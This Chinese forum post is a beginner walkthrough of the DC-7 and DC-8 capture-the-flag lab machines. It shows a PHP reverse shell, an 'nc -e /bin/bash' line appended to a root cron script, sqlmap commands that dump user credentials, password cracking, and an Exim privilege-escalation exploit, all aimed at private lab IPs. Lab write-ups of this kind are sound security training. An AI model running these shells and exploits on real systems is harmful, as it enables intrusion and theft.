吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3199|回复: 27
收起左侧

[CTF] 靶机之DC7,DC8靶机详解,适用新手

  [复制链接]
yunkof 发表于 2023-7-27 19:30

【DC系列07】DC-7靶机复盘

今天刚投递了护网的简历,有点开心,最近几个月每天早9到晚上11点除了吃饭睡午觉都在学习,网络安全真的要学习的知识太多了,给自己加把劲,希望自己可以面上护网,期待努力后的自己。

靶机下载地址:https://www.five86.com/downloads.html

这个靶机同样是直接给ip的

image-20230706195145590

这个靶机在进入shell前是没有破绽的,并且进入主页面以后也并没有什么漏洞。如果不搜索一下这个靶机的解法很难去下一步操作。

在github.com上搜索dc7user然后选择code,里面可以找到dc7一个远程登陆的密码。

这个靶机应该就是想表达的就是源代码泄露漏洞,让你自己去搜索一些信息。

image-20230706195255017

同时我们利用dirsearch -u http://192.168.102.148扫描一下这个网站,发现一个登陆界面

image-20230706212945474

image-20230706200027072

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20230706200246546

远程登陆上以后发现一个mbox文件,打开发现这里面其实指向了一个文件,就是/opt/scripts/backups.sh文件,并且是每隔15分钟运行一次

image-20230706200444019

image-20230706200510734

我们查看一下这个文件,发现这是个root文件,并且www-data组的用户拥有全部权限。

image-20230706200608769

我们进入backups.sh的目录cat一下,发现里面执行了一些代码。

image-20230706202323584

同时我们在/var/mail下发现一个dc7user文件,这个文件显示了backups.sh每次执行的时间,每隔15分钟执行一次,并且发现了backup.sh执行的其他代码。

image-20230706202028258

image-20230706202119674

backup.sh每次执行的时候里面会运行一个drush命令,这个命令可以对drupal搭建的网站进行用户密码修改,我们可以利用重置密码这里来爆破用户名,当用户名正确的时候会发送电子邮件。

image-20230706211317429

确认用户名是admin时候可以直接利用drush进行一个密码修改,然后我们再登陆。

image-20230706202627636

image-20230706202554677

登陆后发现唯一可以写代码的地方不支持php代码,我们就想着装个php插件,让可以运行php代码。

image-20230706202930698

在Manage--Extend--List下面可以添加插件,这里面找了找没有关于php的插件,就需要我们自己从网上找到来添加。

image-20230706202941052

这是一个插件的地址,输入就可以了。

下载地址:https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

image-20230706203333320

点击Install(安装)就按照成功了。

image-20230706203338249

再搜索PHP就找到PHP插件了,再点击Install。

image-20230706203452639

返回Manage--Content再点击Edit。

image-20230706203555703

发现这个可以插入代码的框框就可以输入PHP代码了,这时候我们插入一个PHP反弹shell。

image-20230706203607403

<?php
$ip='192.168.102.129';
$port='8888';
$sock = fsockopen($ip,$port);
$descriptorspec = array(
    0 => $sock, 
    1 => $sock, 
    2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

image-20230706203729679

添加保存成功后再点击运行一下这个页面,反弹shell就成功启动了。

image-20230706203749147

image-20230706203756654

这时候我们就进入到了www-data的shell下,找到刚才的backups.sh文件,往里面追加一条反弹shell。然后等待这个文件下次自己运行,如果自己运行就是以root权限运行的,返回的shell就是root权限的shell,而如果我们自己运行就是普通账户运行的,是不能返回root权限的。

echo "nc -e /bin/bash 192.168.102.129 8888“ >> backups.sh

image-20230706204038318

我们可以看到上次运行时间是22:15分,等到22:30就自动运行backups.sh这个文件了,我们也成功返回了root权限。

image-20230706204755149

image-20230706204537522

【DC系列08】DC-8靶机复盘

靶机下载地址:https://www.five86.com/downloads.html

同样打开靶机后靶机进行一个扫描查找。

image-20230707220507654

扫描到ip后进行一个单独的扫描。

image-20230707220518128

再扫描一下目录,这里有一个登陆界面,等会儿会用上。

image-20230707221456091

image-20230707220500076

sqlmap -u "http://192.168.102.150/?nid=2" --batch --dbs

image-20230707221136469

image-20230707221144482

再对发现的数据库中的表进行一个扫描。

sqlmap -u "http://192.168.102.150/?nid=2" --batch -D d7db --tables

image-20230707221328077

发现有个users表,列出来里面的条目。

sqlmap -u "http://192.168.102.150/?nid=2" --batch -D d7db -T users --columns

image-20230707221539005

有一个名称和密码,我们单独提取出来

sqlmap -u "http://192.168.102.150/?nid=2" --batch -D d7db -T users -C "name,pass" --dump

image-20230707221632039

admin爆破不出来密码,john用户可以爆破出来密码。

image-20230707221858194

利用john工具爆破出john的密码是turtle

image-20230707221837672

然后登陆一下刚才扫描到的登陆网页。

image-20230707222014998

登陆后在网页中找了一圈,发现有一个可以注入PHP代码的地方。

image-20230707222457053

image-20230707222512988

我们在这里面写一个反弹shell,反弹到我们自己的kali中去。

image-20230707222610341

然后提交以下表单。

image-20230707222654316

kali上就拿到了一个web shell权限。

image-20230707223233339

然后利用find / -perm -u=s -type f 2>/dev/null查找以下有权限的文件,发现 有个exim4

image-20230707223806303

再version以下,看看exim4的版本号。

image-20230707224533983

kali中搜索以下这个版本的漏洞,发现有一个合适的。。

image-20230707224604658

我们下载下来并传到靶机中去。

image-20230707225658727

cat了以下46996.sh发现有两种方法可以提权,我两种都用了一遍。

image-20230707225014934

第一种:./46996.sh -m setuid

第二种:./46996.sh -m netcat

image-20230707225612555

这样就提权成功了。

image-20230707225633624

免费评分

参与人数 12威望 +1 吾爱币 +30 热心值 +12 收起 理由
笙若 + 1 + 1 谢谢@Thanks!
Iatk + 1 + 1 谢谢@Thanks!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
xiaopeng128 + 1 + 1 谢谢@Thanks!
hiplease + 1 + 1 谢谢@Thanks!
9lmr + 1 + 1 用心讨论,共获提升!
moshuiNW + 1 + 1 我很赞同!
Xistorg + 1 + 1 谢谢@Thanks!
elevs + 1 + 1 用心讨论,共获提升!
zd53011 + 1 谢谢@Thanks!
1051093860 + 1 + 1 用心讨论,共获提升!
supercilious + 1 + 1 用心讨论,共获提升!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

kuantech 发表于 2023-7-27 20:15
感谢教程,正好在学习 借鉴一下
wHoRU 发表于 2023-7-27 20:30
0xay 发表于 2023-7-27 20:33
tomhex 发表于 2023-7-27 21:18
感谢分享,学习中
MIKOT 发表于 2023-7-27 22:17
感谢分享,小白也来试试
gumuqi 发表于 2023-7-28 05:29
感谢分享
youxiaxy 发表于 2023-7-28 07:37
网络安全这条路相当于全栈了,太广了..
AEht 发表于 2023-7-28 10:09
小白来学习一下,正好之前了解了一些靶机相关的皮毛
Copycodeman 发表于 2023-7-28 15:59
感谢分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-22 13:24

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表